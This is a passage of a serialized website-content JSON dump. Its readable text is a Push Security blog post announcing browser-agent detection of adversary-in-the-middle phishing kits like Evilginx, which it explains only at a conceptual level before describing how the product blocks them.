ata":201666},[],{},{"nodeType":178,"data":201668,"content":201669},{},[201670],{"nodeType":173,"value":196445,"marks":201671,"data":201672},[],{},{"nodeType":312,"data":201674,"content":201677},{"target":201675},{"sys":201676},{"id":196452,"type":317,"linkType":318},[],{"nodeType":169,"data":201679,"content":201680},{},[201681],{"nodeType":173,"value":196458,"marks":201682,"data":201683},[],{},{"nodeType":178,"data":201685,"content":201686},{},[201687],{"nodeType":173,"value":196465,"marks":201688,"data":201689},[],{},{"nodeType":178,"data":201691,"content":201692},{},[201693,201697],{"nodeType":173,"value":196472,"marks":201694,"data":201696},[201695],{"type":370},{},{"nodeType":173,"value":196477,"marks":201698,"data":201699},[],{},{"nodeType":178,"data":201701,"content":201702},{},[201703,201706,201710],{"nodeType":173,"value":196484,"marks":201704,"data":201705},[],{},{"nodeType":173,"value":196488,"marks":201707,"data":201709},[201708],{"type":370},{},{"nodeType":173,"value":196493,"marks":201711,"data":201712},[],{},{"nodeType":178,"data":201714,"content":201715},{},[201716],{"nodeType":173,"value":196500,"marks":201717,"data":201718},[],{},{"nodeType":178,"data":201720,"content":201721},{},[201722],{"nodeType":173,"value":196507,"marks":201723,"data":201724},[],{},{"nodeType":250,"data":201726,"content":201727},{},[201728,201747,201766],{"nodeType":254,"data":201729,"content":201730},{},[201731],{"nodeType":178,"data":201732,"content":201733},{},[201734,201737,201744],{"nodeType":173,"value":196520,"marks":201735,"data":201736},[],{},{"nodeType":186,"data":201738,"content":201739},{"uri":74621},[201740],{"nodeType":173,"value":196323,"marks":201741,"data":201743},[201742],{"type":194},{},{"nodeType":173,"value":197,"marks":201745,"data":201746},[],{},{"nodeType":254,"data":201748,"content":201749},{},[201750],{"nodeType":178,"data":201751,"content":201752},{},[201753,201756,201763],{"nodeType":173,"value":196540,"marks":201754,"data":201755},[],{},{"nodeType":186,"data":201757,"content":201758},{"uri":88025},[201759],{"nodeType":173,"value":196547,"marks":201760,"data":201762},[201761],{"type":194},{},{"nodeType":173,"value":1477,"marks":201764,"data":201765},[],{},{"nodeType":254,"data":201767,"content":201768},{},[201769],{"nodeType":178,"data":201770,"content":201771},{},[201772,201775,201782],{"nodeType":173,"value":196561,"marks":201773,"data":201774},[],{},{"nodeType":186,"data":201776,"content":201777},{"uri":196566},[201778],{"nodeType":173,"value":196569,"marks":201779,"data":201781},[201780],{"type":194},{},{"nodeType":173,"value":481,"marks":201783,"data":201784},[],{},{"nodeType":178,"data":201786,"content":201787},{},[201788],{"nodeType":173,"value":196580,"marks":201789,"data":201790},[],{},{"nodeType":235,"data":201792,"content":201793},{},[201794],{"nodeType":173,"value":196587,"marks":201795,"data":201796},[],{},{"nodeType":178,"data":201798,"content":201799},{},[201800],{"nodeType":173,"value":196594,"marks":201801,"data":201802},[],{},{"nodeType":178,"data":201804,"content":201805},{},[201806],{"nodeType":173,"value":196601,"marks":201807,"data":201808},[],{},{"nodeType":178,"data":201810,"content":201811},{},[201812],{"nodeType":173,"value":196608,"marks":201813,"data":201814},[],{},{"nodeType":178,"data":201816,"content":201817},{},[201818],{"nodeType":173,"value":196615,"marks":201819,"data":201820},[],{},{"nodeType":235,"data":201822,"content":201823},{},[201824],{"nodeType":173,"value":196622,"marks":201825,"data":201826},[],{},{"nodeType":178,"data":201828,"content":201829},{},[201830],{"nodeType":173,"value":196629,"marks":201831,"data":201832},[],{},{"nodeType":178,"data":201834,"content":201835},{},[201836,201839,201846],{"nodeType":173,"value":196636,"marks":201837,"data":201838},[],{},{"nodeType":186,"data":201840,"content":201841},{"uri":4342},[201842],{"nodeType":173,"value":196643,"marks":201843,"data":201845},[201844],{"type":194},{},{"nodeType":173,"value":197,"marks":201847,"data":201848},[],{},{"nodeType":178,"data":201850,"content":201851},{},[201852],{"nodeType":173,"value":196654,"marks":201853,"data":201854},[],{},{"nodeType":312,"data":201856,"content":201859},{"target":201857},{"sys":201858},{"id":196661,"type":317,"linkType":318},[],{"nodeType":178,"data":201861,"content":201862},{},[201863],{"nodeType":173,"value":196667,"marks":201864,"data":201865},[],{},{"nodeType":312,"data":201867,"content":201870},{"target":201868},{"sys":201869},{"id":196674,"type":317,"linkType":318},[],{"nodeType":235,"data":201872,"content":201873},{},[201874],{"nodeType":173,"value":196680,"marks":201875,"data":201876},[],{},{"nodeType":178,"data":201878,"content":201879},{},[201880],{"nodeType":173,"value":196687,"marks":201881,"data":201882},[],{},{"nodeType":178,"data":201884,"content":201885},{},[201886],{"nodeType":173,"value":196694,"marks":201887,"data":201888},[],{},{"nodeType":312,"data":201890,"content":201893},{"target":201891},{"sys":201892},{"id":196701,"type":317,"linkType":318},[],{"nodeType":235,"data":201895,"content":201896},{},[201897],{"nodeType":173,"value":196707,"marks":201898,"data":201899},[],{},{"nodeType":178,"data":201901,"content":201902},{},[201903],{"nodeType":173,"value":196714,"marks":201904,"data":201905},[],{},{"nodeType":178,"data":201907,"content":201908},{},[201909],{"nodeType":173,"value":196721,"marks":201910,"data":201911},[],{},{"nodeType":250,"data":201913,"content":201914},{},[201915,201924,201933],{"nodeType":254,"data":201916,"content":201917},{},[201918],{"nodeType":178,"data":201919,"content":201920},{},[201921],{"nodeType":173,"value":196734,"marks":201922,"data":201923},[],{},{"nodeType":254,"data":201925,"content":201926},{},[201927],{"nodeType":178,"data":201928,"content":201929},{},[201930],{"nodeType":173,"value":196744,"marks":201931,"data":201932},[],{},{"nodeType":254,"data":201934,"content":201935},{},[201936],{"nodeType":178,"data":201937,"content":201938},{},[201939],{"nodeType":173,"value":196754,"marks":201940,"data":201941},[],{},{"nodeType":178,"data":201943,"content":201944},{},[201945],{"nodeType":173,"value":196761,"marks":201946,"data":201947},[],{},{"nodeType":235,"data":201949,"content":201950},{},[201951],{"nodeType":173,"value":196768,"marks":201952,"data":201953},[],{},{"nodeType":178,"data":201955,"content":201956},{},[201957],{"nodeType":173,"value":196775,"marks":201958,"data":201959},[],{},{"nodeType":178,"data":201961,"content":201962},{},[201963],{"nodeType":173,"value":196782,"marks":201964,"data":201965},[],{},{"nodeType":178,"data":201967,"content":201968},{},[201969],{"nodeType":173,"value":196789,"marks":201970,"data":201971},[],{},{"nodeType":235,"data":201973,"content":201974},{},[201975],{"nodeType":173,"value":196796,"marks":201976,"data":201977},[],{},{"nodeType":178,"data":201979,"content":201980},{},[201981],{"nodeType":173,"value":196803,"marks":201982,"data":201983},[],{},{"nodeType":178,"data":201985,"content":201986},{},[201987],{"nodeType":173,"value":196810,"marks":201988,"data":201989},[],{},{"nodeType":250,"data":201991,"content":201992},{},[201993,202006,202019],{"nodeType":254,"data":201994,"content":201995},{},[201996],{"nodeType":178,"data":201997,"content":201998},{},[201999,202003],{"nodeType":173,"value":196823,"marks":202000,"data":202002},[202001],{"type":370},{},{"nodeType":173,"value":196828,"marks":202004,"data":202005},[],{},{"nodeType":254,"data":202007,"content":202008},{},[202009],{"nodeType":178,"data":202010,"content":202011},{},[202012,202016],{"nodeType":173,"value":196838,"marks":202013,"data":202015},[202014],{"type":370},{},{"nodeType":173,"value":196843,"marks":202017,"data":202018},[],{},{"nodeType":254,"data":202020,"content":202021},{},[202022],{"nodeType":178,"data":202023,"content":202024},{},[202025,202029],{"nodeType":173,"value":196853,"marks":202026,"data":202028},[202027],{"type":370},{},{"nodeType":173,"value":196858,"marks":202030,"data":202031},[],{},{"nodeType":312,"data":202033,"content":202036},{"target":202034},{"sys":202035},{"id":196865,"type":317,"linkType":318},[],{"nodeType":169,"data":202038,"content":202039},{},[202040],{"nodeType":173,"value":196871,"marks":202041,"data":202042},[],{},{"nodeType":178,"data":202044,"content":202045},{},[202046,202049,202055,202058,202062,202065,202069,202072,202076],{"nodeType":173,"value":196878,"marks":202047,"data":202048},[],{},{"nodeType":186,"data":202050,"content":202051},{"uri":196883},[202052],{"nodeType":173,"value":18649,"marks":202053,"data":202054},[],{},{"nodeType":173,"value":196889,"marks":202056,"data":202057},[],{},{"nodeType":173,"value":196893,"marks":202059,"data":202061},[202060],{"type":370},{},{"nodeType":173,"value":2936,"marks":202063,"data":202064},[],{},{"nodeType":173,"value":196901,"marks":202066,"data":202068},[202067],{"type":370},{},{"nodeType":173,"value":196906,"marks":202070,"data":202071},[],{},{"nodeType":173,"value":138,"marks":202073,"data":202075},[202074],{"type":370},{},{"nodeType":173,"value":196914,"marks":202077,"data":202078},[],{},{"nodeType":312,"data":202080,"content":202083},{"target":202081},{"sys":202082},{"id":196921,"type":317,"linkType":318},[],{"nodeType":235,"data":202085,"content":202086},{},[202087],{"nodeType":173,"value":196927,"marks":202088,"data":202089},[],{},{"nodeType":178,"data":202091,"content":202092},{},[202093,202096,202102],{"nodeType":173,"value":196934,"marks":202094,"data":202095},[],{},{"nodeType":186,"data":202097,"content":202098},{"uri":473},[202099],{"nodeType":173,"value":88194,"marks":202100,"data":202101},[],{},{"nodeType":173,"value":196944,"marks":202103,"data":202104},[],{},{"nodeType":312,"data":202106,"content":202109},{"target":202107},{"sys":202108},{"id":196951,"type":317,"linkType":318},[],{"nodeType":178,"data":202111,"content":202112},{},[202113],{"nodeType":173,"value":37,"marks":202114,"data":202115},[],{},{"items":202117},[202118,202120],{"sys":202119,"name":509},{"id":508},{"sys":202121,"name":505},{"id":504},{"items":202123},[202124],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":202125},{"url":516},{"__typename":1528,"sys":202127,"content":202128,"title":202530,"synopsis":202531,"hashTags":118,"publishedDate":202532,"slug":202533,"tagsCollection":202534,"authorsCollection":202540},{"id":114387},{"json":202129},{"nodeType":165,"data":202130,"content":202131},{},[202132,202138,202159,202180,202198,202218,202241,202248,202268,202288,202295,202301,202308,202315,202322,202329,202336,202343,202350,202356,202363,202382,202389,202394,202416,202423,202438,202444,202463,202470,202477,202483,202490,202508,202514],{"nodeType":312,"data":202133,"content":202137},{"target":202134},{"sys":202135},{"id":202136,"type":317,"linkType":318},"B8i0EK90Dn7FLrJXR4ANh",[],{"nodeType":178,"data":202139,"content":202140},{},[202141,202145,202155],{"nodeType":173,"value":202142,"marks":202143,"data":202144},"Is the golden era of MFA protection over? Watch a demo of an ",[],{},{"nodeType":1698,"data":202146,"content":202150},{"target":202147},{"sys":202148},{"id":202149,"type":317,"linkType":318},"7DJnckJxP4CXyXhPJJpby5",[202151],{"nodeType":173,"value":202152,"marks":202153,"data":202154},"EvilNoVNC phishing attack",[],{},{"nodeType":173,"value":202156,"marks":202157,"data":202158}," and you may be left sweating a little and whispering “FIDO2” like a protection spell.",[],{},{"nodeType":178,"data":202160,"content":202161},{},[202162,202166,202176],{"nodeType":173,"value":202163,"marks":202164,"data":202165},"With the widespread adoption of MFA, attackers are ",[],{},{"nodeType":1698,"data":202167,"content":202171},{"target":202168},{"sys":202169},{"id":202170,"type":317,"linkType":318},"6XIts2UEnrsJDki8gKDXyI",[202172],{"nodeType":173,"value":202173,"marks":202174,"data":202175},"increasingly turning",[],{},{"nodeType":173,"value":202177,"marks":202178,"data":202179}," to more sophisticated methods of credential theft as their initial point of entry. ",[],{},{"nodeType":178,"data":202181,"content":202182},{},[202183,202187,202194],{"nodeType":173,"value":202184,"marks":202185,"data":202186},"Newer phishing approaches include reverse proxies as well as tools that mimic legitimate login pages by rendering the webpages and then displaying those renders to the unsuspecting end-user. While these tools are not always common knowledge among blue teams, their use is ",[],{},{"nodeType":186,"data":202188,"content":202189},{"uri":183364},[202190],{"nodeType":173,"value":202191,"marks":202192,"data":202193},"on the rise",[],{},{"nodeType":173,"value":202195,"marks":202196,"data":202197},", an unsurprising response to the broad use of multi-factor authentication in many organizations.",[],{},{"nodeType":178,"data":202199,"content":202200},{},[202201,202205,202214],{"nodeType":173,"value":202202,"marks":202203,"data":202204},"What sets this generation of ",[],{},{"nodeType":1698,"data":202206,"content":202209},{"target":202207},{"sys":202208},{"id":202149,"type":317,"linkType":318},[202210],{"nodeType":173,"value":202211,"marks":202212,"data":202213},"Adversary-in-the-Middle (AitM) phishing tools",[],{},{"nodeType":173,"value":202215,"marks":202216,"data":202217}," apart? ",[],{},{"nodeType":250,"data":202219,"content":202220},{},[202221,202231],{"nodeType":254,"data":202222,"content":202223},{},[202224],{"nodeType":178,"data":202225,"content":202226},{},[202227],{"nodeType":173,"value":202228,"marks":202229,"data":202230},"They act as a proxy between the user and a legitimate web login page, allowing the attacker to bypass MFA and harvest credentials and session tokens.",[],{},{"nodeType":254,"data":202232,"content":202233},{},[202234],{"nodeType":178,"data":202235,"content":202236},{},[202237],{"nodeType":173,"value":202238,"marks":202239,"data":202240},"They give off little scent to end-users, because the end-user is logging into the legitimate site, just by taking a detour via the attacker’s device.",[],{},{"nodeType":178,"data":202242,"content":202243},{},[202244],{"nodeType":173,"value":202245,"marks":202246,"data":202247},"These AitM tools are also difficult to detect — unless you have eyes in the browser.",[],{},{"nodeType":178,"data":202249,"content":202250},{},[202251,202255,202264],{"nodeType":173,"value":202252,"marks":202253,"data":202254},"Powered by the Push browser agent, Push now offers a ",[],{},{"nodeType":1698,"data":202256,"content":202259},{"target":202257},{"sys":202258},{"id":2148,"type":317,"linkType":318},[202260],{"nodeType":173,"value":202261,"marks":202262,"data":202263},"preconfigured set of detections",[],{},{"nodeType":173,"value":202265,"marks":202266,"data":202267}," for phishing tools like Evilginx and others, informed by our threat detection team’s research into their behavior. This phishing tool detection feature will automatically prevent users from accessing a site that’s running one of these malicious tools, and display a custom warning message to your end-users.",[],{},{"nodeType":178,"data":202269,"content":202270},{},[202271,202275,202284],{"nodeType":173,"value":202272,"marks":202273,"data":202274},"While Push already provides strong phishing protection by ",[],{},{"nodeType":1698,"data":202276,"content":202279},{"target":202277},{"sys":202278},{"id":189461,"type":317,"linkType":318},[202280],{"nodeType":173,"value":202281,"marks":202282,"data":202283},"preventing SSO password use",[],{},{"nodeType":173,"value":202285,"marks":202286,"data":202287}," on non-IdP webpages (in other words, it stops you from using your Okta password on any page that isn’t an Okta login page), this new feature allows us to sharpen our anti-phishing capabilities by detecting malware on a site before a user even interacts with the page. ",[],{},{"nodeType":178,"data":202289,"content":202290},{},[202291],{"nodeType":173,"value":202292,"marks":202293,"data":202294},"In this article, we’ll describe our approach to detecting these newer phishing tools, including how we’re borrowing techniques from the world of EDR, and how you can combine phishing tool detection with other Push controls for a defense-in-depth strategy that covers both the user and the application sides of the equation.",[],{},{"nodeType":312,"data":202296,"content":202300},{"target":202297},{"sys":202298},{"id":202299,"type":317,"linkType":318},"59q6klX2j7ClgUvmix93sG",[],{"nodeType":169,"data":202302,"content":202303},{},[202304],{"nodeType":173,"value":202305,"marks":202306,"data":202307},"Taking a page from EDR",[],{},{"nodeType":178,"data":202309,"content":202310},{},[202311],{"nodeType":173,"value":202312,"marks":202313,"data":202314},"Most phishing prevention solutions rely on lists of known-bad sites as the source of intelligence. These are always going to be a step behind reality because they rely on ever-shifting secondary attributes such as domain names (though we won’t be disabling Chrome Safe Browsing anytime soon, and we’re not trying to replace it).",[],{},{"nodeType":178,"data":202316,"content":202317},{},[202318],{"nodeType":173,"value":202319,"marks":202320,"data":202321},"As veterans of the EDR world, we’re drawn to think in analogous terms. With detecting AitM phishing tools, that means expanding on the concept of dynamic analysis on the endpoint. EDR allows you to dynamically analyze the behavior of malware live and at scale, rather than focusing on easy-to-change indicators like file hashes or domain names.",[],{},{"nodeType":178,"data":202323,"content":202324},{},[202325],{"nodeType":173,"value":202326,"marks":202327,"data":202328},"Applying this idea to malware that runs in the browser requires a solution that is in the browser, like the Push browser agent.",[],{},{"nodeType":178,"data":202330,"content":202331},{},[202332],{"nodeType":173,"value":202333,"marks":202334,"data":202335},"So we’re expanding the attributes that are traditionally analyzed to spot indicators of compromise (IoCs) beyond domains, file names, file hashes, IP addresses, etc., to also include behavioral attributes of malware that are much harder to change, such as Javascript calls being made or data structures saved to local storage.",[],{},{"nodeType":178,"data":202337,"content":202338},{},[202339],{"nodeType":173,"value":202340,"marks":202341,"data":202342},"By performing behavioral analysis on AitM automated proxy tools, we can directly analyze the application for a precise and immediate identification. ",[],{},{"nodeType":178,"data":202344,"content":202345},{},[202346],{"nodeType":173,"value":202347,"marks":202348,"data":202349},"Push researchers are regularly identifying and adding detections for new toolkits — think of this like Push’s database of threat research in action.",[],{},{"nodeType":169,"data":202351,"content":202352},{},[202353],{"nodeType":173,"value":189115,"marks":202354,"data":202355},[],{},{"nodeType":178,"data":202357,"content":202358},{},[202359],{"nodeType":173,"value":202360,"marks":202361,"data":202362},"If you’re new to Push, a bit of context may be useful. Push uses a browser agent deployed to employee browsers (we support all major browsers) to prevent, detect, and block identity attacks. ",[],{},{"nodeType":178,"data":202364,"content":202365},{},[202366,202370,202378],{"nodeType":173,"value":202367,"marks":202368,"data":202369},"By directly observing user behavior at the login event, Push provides broad and actionable context across all the apps your employees are using, how they are accessing them, their MFA methods, and where they’re using insecure and reused passwords. With this context as the foundation, Push enforces your desired ",[],{},{"nodeType":1698,"data":202371,"content":202374},{"target":202372},{"sys":202373},{"id":183439,"type":317,"linkType":318},[202375],{"nodeType":173,"value":155418,"marks":202376,"data":202377},[],{},{"nodeType":173,"value":202379,"marks":202380,"data":202381},", including preventing SSO password reuse, blocking malicious websites, or steering employees to approved apps only.",[],{},{"nodeType":178,"data":202383,"content":202384},{},[202385],{"nodeType":173,"value":202386,"marks":202387,"data":202388},"Once configured by an administrator, phishing tool detection will immediately check for the fingerprints of these toolkits as end-users visit websites and then display your custom warn or block message. ",[],{},{"nodeType":312,"data":202390,"content":202393},{"target":202391},{"sys":202392},{"id":189099,"type":317,"linkType":318},[],{"nodeType":178,"data":202395,"content":202396},{},[202397,202400,202404,202408,202412],{"nodeType":173,"value":180786,"marks":202398,"data":202399},[],{},{"nodeType":173,"value":2748,"marks":202401,"data":202403},[202402],{"type":370},{},{"nodeType":173,"value":202405,"marks":202406,"data":202407}," mode, users cannot proceed to the site where malicious software has been detected. In ",[],{},{"nodeType":173,"value":2740,"marks":202409,"data":202411},[202410],{"type":370},{},{"nodeType":173,"value":202413,"marks":202414,"data":202415}," mode, users can choose to proceed if they are sure it’s not a phishing site.",[],{},{"nodeType":178,"data":202417,"content":202418},{},[202419],{"nodeType":173,"value":202420,"marks":202421,"data":202422},"In both cases, users do not need to interact with a page (by typing, clicking, etc.) for Push to trigger the custom message. ",[],{},{"nodeType":178,"data":202424,"content":202425},{},[202426,202429,202435],{"nodeType":173,"value":196274,"marks":202427,"data":202428},[],{},{"nodeType":186,"data":202430,"content":202431},{"uri":183466},[202432],{"nodeType":173,"value":155030,"marks":202433,"data":202434},[],{},{"nodeType":173,"value":196284,"marks":202436,"data":202437},[],{},{"nodeType":312,"data":202439,"content":202443},{"target":202440},{"sys":202441},{"id":202442,"type":317,"linkType":318},"6oAhxLBPVxN3Rcw2kFeVtG",[],{"nodeType":178,"data":202445,"content":202446},{},[202447,202451,202459],{"nodeType":173,"value":202448,"marks":202449,"data":202450},"Pairing this phishing detection capability with Push’s ",[],{},{"nodeType":1698,"data":202452,"content":202455},{"target":202453},{"sys":202454},{"id":2405,"type":317,"linkType":318},[202456],{"nodeType":173,"value":125683,"marks":202457,"data":202458},[],{},{"nodeType":173,"value":202460,"marks":202461,"data":202462}," feature provides a strong defense-in-depth strategy for stopping credential theft.",[],{},{"nodeType":178,"data":202464,"content":202465},{},[202466],{"nodeType":173,"value":202467,"marks":202468,"data":202469},"SSO password protection works by analyzing user behavior — namely, is a user entering their SSO password onto a page that does not belong to the legitimate identity provider.",[],{},{"nodeType":178,"data":202471,"content":202472},{},[202473],{"nodeType":173,"value":202474,"marks":202475,"data":202476},"Phishing tool detection adds in the application-level behavioral analysis. In addition, when Push identifies a new, previously unknown phishing tool in the wild via blocked SSO credential theft, we add its fingerprints to the browser agent’s detective capabilities.  ",[],{},{"nodeType":169,"data":202478,"content":202479},{},[202480],{"nodeType":173,"value":117844,"marks":202481,"data":202482},[],{},{"nodeType":178,"data":202484,"content":202485},{},[202486],{"nodeType":173,"value":202487,"marks":202488,"data":202489},"We’re just scratching the surface on this approach and are exploring how Push can identify and block other web-delivered malware and Javascript-based attack types beyond AitM tools. Think HTML smuggling, tabnabbing, and the like.",[],{},{"nodeType":178,"data":202491,"content":202492},{},[202493,202497,202505],{"nodeType":173,"value":202494,"marks":202495,"data":202496},"Got feedback? We’d ",[],{},{"nodeType":186,"data":202498,"content":202500},{"uri":202499},"/contact/",[202501],{"nodeType":173,"value":202502,"marks":202503,"data":202504},"love to talk",[],{},{"nodeType":173,"value":1477,"marks":202506,"data":202507},[],{},{"nodeType":169,"data":202509,"content":202510},{},[202511],{"nodeType":173,"value":71801,"marks":202512,"data":202513},[],{},{"nodeType":178,"data":202515,"content":202516},{},[202517,202520,202526],{"nodeType":173,"value":114452,"marks":202518,"data":202519},[],{},{"nodeType":186,"data":202521,"content":202522},{"uri":473},[202523],{"nodeType":173,"value":88194,"marks":202524,"data":202525},[],{},{"nodeType":173,"value":202527,"marks":202528,"data":202529},". We’ll be happy to show you this feature, along with how we discover all the apps your employees are using, even the ones not behind SSO, and how we detect vulnerable identities and stop identity attacks with browser-based controls.",[],{},"Introducing AitM phishing toolkit detection, powered by the Push browser agent","Push analyzes behavioral attributes of malware to identify phishing tools like Evilginx and NakedPages and immediately block end-users from visiting them.","2024-06-06T00:00:00.000Z","introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser",{"items":202535},[202536,202538],{"sys":202537,"name":18399},{"id":18398},{"sys":202539,"name":509},{"id":508},{"items":202541},[202542],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":202543},{"url":2911},{"items":202545},[202546],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":202547},{"url":1496},{"json":202549,"links":202811},{"nodeType":165,"data":202550,"content":202551},{},[202552,202558,202564,202570,202576,202582,202588,202594,202599,202605,202611,202617,202623,202629,202645,202651,202657,202673,202679,202688,202694,202719,202725,202731,202737,202743,202748,202754,202760,202766,202772,202778,202784,202800,202805],{"nodeType":178,"data":202553,"content":202554},{},[202555],{"nodeType":173,"value":182710,"marks":202556,"data":202557},[],{},{"nodeType":169,"data":202559,"content":202560},{},[202561],{"nodeType":173,"value":182717,"marks":202562,"data":202563},[],{},{"nodeType":178,"data":202565,"content":202566},{},[202567],{"nodeType":173,"value":182724,"marks":202568,"data":202569},[],{},{"nodeType":178,"data":202571,"content":202572},{},[202573],{"nodeType":173,"value":182731,"marks":202574,"data":202575},[],{},{"nodeType":178,"data":202577,"content":202578},{},[202579],{"nodeType":173,"value":182738,"marks":202580,"data":202581},[],{},{"nodeType":169,"data":202583,"content":202584},{},[202585],{"nodeType":173,"value":182745,"marks":202586,"data":202587},[],{},{"nodeType":178,"data":202589,"content":202590},{},[202591],{"nodeType":173,"value":182752,"marks":202592,"data":202593},[],{},{"nodeType":312,"data":202595,"content":202598},{"target":202596},{"sys":202597},{"id":71430,"type":317,"linkType":318},[],{"nodeType":178,"data":202600,"content":202601},{},[202602],{"nodeType":173,"value":182764,"marks":202603,"data":202604},[],{},{"nodeType":235,"data":202606,"content":202607},{},[202608],{"nodeType":173,"value":182771,"marks":202609,"data":202610},[],{},{"nodeType":178,"data":202612,"content":202613},{},[202614],{"nodeType":173,"value":182778,"marks":202615,"data":202616},[],{},{"nodeType":235,"data":202618,"content":202619},{},[202620],{"nodeType":173,"value":182785,"marks":202621,"data":202622},[],{},{"nodeType":178,"data":202624,"content":202625},{},[202626],{"nodeType":173,"value":182792,"marks":202627,"data":202628},[],{},{"nodeType":178,"data":202630,"content":202631},{},[202632,202635,202642],{"nodeType":173,"value":182799,"marks":202633,"data":202634},[],{},{"nodeType":186,"data":202636,"content":202637},{"uri":182804},[202638],{"nodeType":173,"value":182807,"marks":202639,"data":202641},[202640],{"type":194},{},{"nodeType":173,"value":182812,"marks":202643,"data":202644},[],{},{"nodeType":178,"data":202646,"content":202647},{},[202648],{"nodeType":173,"value":182819,"marks":202649,"data":202650},[],{},{"nodeType":235,"data":202652,"content":202653},{},[202654],{"nodeType":173,"value":182826,"marks":202655,"data":202656},[],{},{"nodeType":178,"data":202658,"content":202659},{},[202660,202663,202670],{"nodeType":173,"value":182833,"marks":202661,"data":202662},[],{},{"nodeType":186,"data":202664,"content":202665},{"uri":4342},[202666],{"nodeType":173,"value":835,"marks":202667,"data":202669},[202668],{"type":194},{},{"nodeType":173,"value":1477,"marks":202671,"data":202672},[],{},{"nodeType":178,"data":202674,"content":202675},{},[202676],{"nodeType":173,"value":182850,"marks":202677,"data":202678},[],{},{"nodeType":178,"data":202680,"content":202681},{},[202682,202685],{"nodeType":173,"value":182857,"marks":202683,"data":202684},[],{},{"nodeType":173,"value":182861,"marks":202686,"data":202687},[],{},{"nodeType":235,"data":202689,"content":202690},{},[202691],{"nodeType":173,"value":182868,"marks":202692,"data":202693},[],{},{"nodeType":178,"data":202695,"content":202696},{},[202697,202700,202707,202710,202716],{"nodeType":173,"value":182875,"marks":202698,"data":202699},[],{},{"nodeType":186,"data":202701,"content":202702},{"uri":49844},[202703],{"nodeType":173,"value":182882,"marks":202704,"data":202706},[202705],{"type":194},{},{"nodeType":173,"value":182887,"marks":202708,"data":202709},[],{},{"nodeType":186,"data":202711,"content":202712},{"uri":775},[202713],{"nodeType":173,"value":778,"marks":202714,"data":202715},[],{},{"nodeType":173,"value":182897,"marks":202717,"data":202718},[],{},{"nodeType":178,"data":202720,"content":202721},{},[202722],{"nodeType":173,"value":182904,"marks":202723,"data":202724},[],{},{"nodeType":169,"data":202726,"content":202727},{},[202728],{"nodeType":173,"value":182911,"marks":202729,"data":202730},[],{},{"nodeType":178,"data":202732,"content":202733},{},[202734],{"nodeType":173,"value":182918,"marks":202735,"data":202736},[],{},{"nodeType":178,"data":202738,"content":202739},{},[202740],{"nodeType":173,"value":182925,"marks":202741,"data":202742},[],{},{"nodeType":312,"data":202744,"content":202747},{"target":202745},{"sys":202746},{"id":27078,"type":317,"linkType":318},[],{"nodeType":178,"data":202749,"content":202750},{},[202751],{"nodeType":173,"value":182937,"marks":202752,"data":202753},[],{},{"nodeType":169,"data":202755,"content":202756},{},[202757],{"nodeType":173,"value":182944,"marks":202758,"data":202759},[],{},{"nodeType":178,"data":202761,"content":202762},{},[202763],{"nodeType":173,"value":182951,"marks":202764,"data":202765},[],{},{"nodeType":178,"data":202767,"content":202768},{},[202769],{"nodeType":173,"value":182958,"marks":202770,"data":202771},[],{},{"nodeType":178,"data":202773,"content":202774},{},[202775],{"nodeType":173,"value":182965,"marks":202776,"data":202777},[],{},{"nodeType":169,"data":202779,"content":202780},{},[202781],{"nodeType":173,"value":1422,"marks":202782,"data":202783},[],{},{"nodeType":178,"data":202785,"content":202786},{},[202787,202790,202797],{"nodeType":173,"value":182978,"marks":202788,"data":202789},[],{},{"nodeType":186,"data":202791,"content":202792},{"uri":473},[202793],{"nodeType":173,"value":182985,"marks":202794,"data":202796},[202795],{"type":194},{},{"nodeType":173,"value":37,"marks":202798,"data":202799},[],{},{"nodeType":312,"data":202801,"content":202804},{"target":202802},{"sys":202803},{"id":155960,"type":317,"linkType":318},[],{"nodeType":178,"data":202806,"content":202807},{},[202808],{"nodeType":173,"value":37,"marks":202809,"data":202810},[],{},{"entries":202812},{"hyperlink":202813,"inline":202814,"block":202815},[],[],[202816,202819,202822],{"sys":202817,"__typename":5345,"title":137033,"caption":137034,"layoutMode":118,"file":202818},{"id":71430},{"url":137036,"width":137037,"height":137037},{"sys":202820,"__typename":5345,"title":78140,"caption":78141,"layoutMode":118,"file":202821},{"id":27078},{"url":78143,"width":78144,"height":78145},{"sys":202823,"__typename":15269,"type":112637,"ctaText":170057,"buttonLabel":170058,"buttonColour":15273,"buttonUrl":118},{"id":155960},"content:blog:how-many-vulnerable-identities-do-you-have.json","blog/how-many-vulnerable-identities-do-you-have.json","blog/how-many-vulnerable-identities-do-you-have",{"_path":202828,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":202829,"ogImage":118,"summary":202831,"title":198018,"subtitle":118,"metaTitle":202842,"synopsis":198019,"hashTags":118,"publishedDate":198020,"slug":198021,"tagsCollection":202843,"content":202849,"relatedBlogPostsCollection":203778,"authorsCollection":206093,"_id":206097,"_type":5439,"_source":5440,"_file":206098,"_stem":206099,"_extension":5439},"/blog/the-saas-attack-matrix-one-year-on",{"id":196975,"publishedAt":202830},"2024-08-28T14:24:56.222Z",{"json":202832},{"data":202833,"content":202834,"nodeType":165},{},[202835],{"data":202836,"content":202837,"nodeType":178},{},[202838],{"data":202839,"marks":202840,"value":202841,"nodeType":173},{},[],"It’s been almost exactly a year since we released the SaaS attack matrix – our open source repository of SaaS-native attack techniques. So, it’s a good time to look at what’s changed, and which techniques we’ve seen rise to prominence in the wild.","Reflecting on a year of SaaS identity attacks",{"items":202844},[202845,202847],{"sys":202846,"name":505},{"id":504},{"sys":202848,"name":509},{"id":508},{"json":202850,"links":203769},{"data":202851,"content":202852,"nodeType":165},{},[202853,202869,202875,202881,202887,202893,202896,202902,202977,202983,202989,202995,203008,203024,203030,203033,203039,203045,203051,203067,203087,203093,203099,203125,203151,203157,203173,203179,203185,203191,203198,203204,203230,203236,203252,203278,203284,203300,203306,203312,203328,203334,203340,203343,203349,203355,203361,203364,203370,203376,203382,203398,203514,203520,203523,203529,203535,203626,203632,203638,203641,203647,203653,203699,203705,203711,203714,203720,203726,203742,203758,203763],{"data":202854,"content":202855,"nodeType":178},{},[202856,202859,202866],{"data":202857,"marks":202858,"value":196986,"nodeType":173},{},[],{"data":202860,"content":202861,"nodeType":186},{"uri":88239},[202862],{"data":202863,"marks":202864,"value":88742,"nodeType":173},{},[202865],{"type":194},{"data":202867,"marks":202868,"value":196997,"nodeType":173},{},[],{"data":202870,"content":202871,"nodeType":178},{},[202872],{"data":202873,"marks":202874,"value":197004,"nodeTy